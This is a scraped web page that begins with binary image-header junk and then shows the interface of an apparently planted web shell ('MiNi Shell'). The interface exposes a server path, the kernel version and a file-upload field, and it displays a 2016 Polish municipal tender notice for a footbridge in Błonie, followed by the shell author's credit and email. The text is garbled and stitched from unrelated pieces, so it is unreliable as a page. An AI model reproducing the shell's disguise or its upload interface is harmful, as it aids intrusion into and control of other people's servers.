JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160210/14079-N-2016.html

<p class="kh_header"><b>Błonie: Budowa kładki dla pieszych na rzece Rokitnicy przy obiekcie mostowym w ciągu drogi gminnej ul. Piłsudskiego w Błoniu.</b><br>
<b>Numer ogłoszenia: 14079 - 2016; data zamieszczenia: 10.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Błonie , Rynek 6, 05-870 Błonie, woj. mazowieckie, tel. 022 7253004, 7253006, faks 022 7253067.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.blonie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kładki dla pieszych na rzece Rokitnicy przy obiekcie mostowym w ciągu drogi gminnej ul. Piłsudskiego w Błoniu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa kładki zlokalizowanej na rzece Rokitnica w hm 4+535 przy obiekcie mostowym w ciągu drogi gminnej ul. Piłsudskiego w Błoniu wraz z wyprofilowaniem przylegających do niej skarp.

2. Dodatkowe uwarunkowania przy realizacji robót:
1) W przypadku zniszczenia nawierzchni drogi gminnej ul. Piłsudskiego, Mickiewicza, Wykonawca będzie miał w obowiązku doprowadzenie drogi do stanu sprzed zniszczenia, z zachowaniem wszystkich wymagań SST dla robót drogowych. Wszelkie koszty finansowe z tym związane poniesie Wykonawca robót. 
2) Należy zwrócić szczególną uwagę na dostarczane i odbierane dzieci do/z przedszkola przy ulicy Piłsudskiego. Kierowcy obsługujący plac budowy mają w obowiązku poruszać się z prędkością nie powodującą zagrożenia dla ruchu pieszego, tj. max. 30 km/h. 
3) Przed rozpoczęciem robót Wykonawca opracuje i przekaże Zamawiającemu zaopiniowany i zatwierdzony projekt czasowej organizacji ruchu. 
4) Uzgodniona i zatwierdzona czasowa organizacja ruchu będzie podstawą do wprowadzenia Wykonawcy na budowę i rozpoczęcia robót budowlanych..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego , o którym jest mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych ( do 50% wartości zamówienia)</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.20.00.00-9, 45.23.30.00-9, 45.22.00.00-5, 45.23.00.00-8, 45.40.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium: 
    1. Wysokość wadium.
    1.1. Każda składana oferta musi być zabezpieczona wadium w wysokości 5 000,00 PLN     
           (słownie: pięć tysięcy złotych).   
    2. Forma wadium.
    2.1. Wadium może być wnoszone w jednej lub kilku następujących formach:
     a). pieniądzu,
     b). poręczeniach bankowych  lub poręczeniach spółdzielczej kasy oszczędnościowo -  
           kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
     c). gwarancjach bankowych,
     d). gwarancjach ubezpieczeniowych,
     e). poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 
          ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju      
          Przedsiębiorczości  (Dz. U. Nr 109, poz. 1158,  z późn. zm.)
    3. Miejsce i sposób wniesienia wadium.
    3.1. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy  
           Zamawiającego:  Bank PKO BP S.A.  VO/Warszawa
                                        nr rachunku: 95 1020 1055  0000 9302 0024 2743
    3.2. Do oferty należy dołączyć kopię polecenia przelewu potwierdzoną za zgodność z 
           oryginałem lub dostarczyć ją Zamawiającemu przed otwarciem ofert.
    3.3. Wadium wnoszone w formie pieniężnej uznaje się za wniesione, jeżeli znajdzie się na   
           koncie Zamawiającego przed upływem terminu składania ofert.
           Termin wniesienia wadium potwierdza bank prowadzący bankową obsługę Gminy.
    3.4. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
    3.5. W przypadku składania wadium w jednej z form wymienionych w pkt 2.1 niniejszego 
            rozdziału, dokument winien zawierać jednoznacznie sformułowane: nazwę  i adres 
           Zamawiającego, przedmiot zamówienia i nr sprawy, termin obowiązywania dokumentu,     
           wysokość wadium oraz warunki zwrotu i zatrzymania przez Zamawiającego wadium 
           wraz z odsetkami, zgodnie z art. 46 ustawy z dnia 29 stycznia 2004 r. Pzp.
    4. Oryginał wadium (w przypadku przelewu - potwierdzenie dokonania przelewu na konto 
        Zamawiającego) należy złożyć w Wydziale Zamówień Publicznych w Urzędzie Miejskim
        w Błoniu (Ratusz), ul. Rynek 6, pokój nr 3 (parter) - przed upływem terminu składania         
        ofert lub załączyć do oferty.
    5. Wykonawca, który nie wniósł wadium zostaje wykluczony z postępowania na podstawie 
         art. 24 ust. 2 pkt 2, a złożoną przez niego ofertę uznaje się za odrzuconą.
    6. Zwrot wadium.
    6.1. Zamawiający zwraca wadium zgodnie z zapisem art. 46 ust. 1- 4 ustawy Pzp
    7. Utrata wadium.
   7.1. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi
          na wezwanie, o którym mowa w art. 26 ust.3 ustawy Prawo zamówień publicznych
          nie złożył dokumentów lub oświadczeń lub pełnomocnictw, chyba że udowodni, że 
          wynika to z przyczyn nieleżących po jego stronie.   
   7.2. Zamawiający zatrzymuje wadium wraz z odsetkami, w przypadkach określonych w 
          art.46 ust.5 ustawy jeżeli Wykonawca, którego oferta została wybrana:
     a). odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 
          określonych w ofercie,


     b). nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
     c). zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn   
          leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna, że Wykonawca spełnia warunek dotyczący wiedzy i doświadczenia, jeżeli 
       wykaże,  że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres   
prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej:
a) dwie roboty o podobnym charakterze co przedmiot zamówienia, tj. roboty polegające na budowie lub przebudowie obiektów mostowych, z podaniem daty i miejsca wykonania oraz wartości. Do każdej wykazanej roboty należy załączyć ( referencje) potwierdzające, że robota została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna, że Wykonawca spełnia warunek dotyczący dysponowania osobami 
zdolnymi do wykonania zamówienia, jeżeli wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia w tym:
         kierownikiem budowy w specjalności mostowej, z uprawnieniami budowlanymi do
         nadzorowania (kierowania) robotami budowlanymi w specjalności mostowej 
         posiadającym 3 letnie   doświadczenie w nadzorowaniu (kierowaniu) robotami branży 
         mostowej  licząc od dnia uzyskania uprawnień z aktualnym zaświadczeniem o 
         przynależności do Izby Inżynierów Budownictwa,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna, że Wykonawca spełnia warunek dotyczący sytuacji ekonomicznej i 
          finansowej jeżeli wykaże, że posiada opłaconą polisę OC w zakresie prowadzonej działalności 
          związanej z przedmiotem zamówienia na kwotę nie mniejszą niż  200 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Na ofertę składają się inne dokumenty wymagane przez Zamawiającego:
 1.1. druk oferty wypełniony i podpisany przez osoby uprawnione, (załącznik nr 1 do SIWZ)
 1.2. uproszczony kosztorys ofertowy
 1.3. dowód wniesienia wadium
 1.4. oświadczenie o spełnianiu warunków określonych przepisami art. 44 ustawy Pzp,    
        (załącznik nr 4 do SIWZ)
 1.5. druk oświadczenia o przynależności do grupy kapitałowej, (załącznik nr 5 do SIWZ)          
 1.6. podpisany wzór umowy, (załącznik nr 8 do SIWZ)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, 
        na podstawie której dokonano wyboru Wykonawcy, zgodnie z art. 144 ust.1 ustawy Pzp, 
        chyba, że wystąpiły nw. okoliczności:
1.1. zmiana wynagrodzenia związana ze zmianą zakresu robót:
a)  konieczności wykonania robót zamiennych. Nastąpi wówczas rozliczenie robót zamiennych, 
b) rezygnacja przez Zamawiającego z realizacji części przedmiotu zamówienia. W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które poniósł Wykonawca w związku z wynikającymi z umowy planowanymi świadczeniami.
1.2. zmiana terminu realizacji w związku z następującymi przypadkami :
a) koniecznością wprowadzenia zmian w dokumentacji projektowej, wynikających ze zmiany zastosowania urządzeń technologicznych (np. braki w produkcji, itp), wymogów sztuki budowlanej i wiedzy technicznej lub powszechnie obowiązujących przepisów prawa,
b) z brakiem możliwości prowadzenia robót na skutek obiektywnych warunków atmosferycznych lub jeżeli warunki atmosferyczne uniemożliwiają prowadzenie robót budowlanych zgodnie z wymaganiami opisanymi w specyfikacji technicznej lub sztuką budowlaną. Wstrzymanie robót z tego powodu musi być potwierdzone w dzienniku budowy i zaakceptowane przez inspektora nadzoru inwestorskiego. Wstrzymanie robót budowlanych ze względu na warunki  atmosferyczne typowe  (właściwe) dla danej pory roku i miesiąca, lub zła organizacja robót nie uzasadnia zmiany umowy,
c) wstrzymaniem prac budowlanych przez właściwy organ z przyczyn niezawinionych przez   
    Wykonawcę,
d) opóźnieniem niezależnym od Wykonawcy związanym z uzyskiwaniem przez Wykonawcę
     dokumentów w myśl ustawy Prawo budowlane,
e) koniecznością wykonania zamówień dodatkowych, uzupełniających lub robót zamiennych,
f) innymi okolicznościami niepowstałymi z winy Wykonawcy ( które nie miałyby wpływu na jego wybór ),
g) innymi okolicznościami leżącymi po stronie Zamawiającego, a w szczególności sytuacją finansową, zdolnościami płatniczymi  lub warunkami organizacyjnymi.
1.3. inne przyczyny
   a) zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości 
       stawki   podatku VAT) .
2. Powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić 
    zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody zarówno 
     przez Zamawiającego jak i przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.blonie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Błoniu, il. Rynek 6, 05-870 Błonie pok. nr 3 Wydział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.02.2016 godzina 12:00, miejsce: Urząd Miejski w Błoniu, il. Rynek 6, 05-870 Błonie pok. nr 1 Biuro Obsługi Interaesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osoby uprawnione do kontaktu z Wykonawcami: 
 Iwona Kopczyńska(procedury przetargowe)                 -  Urząd Miejski w Błoniu, ul. Rynek 6
                     Wydział Zamówień Publicznych,  pok. nr 3  
                                                      tel. 22 725-30-04  w.180,.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com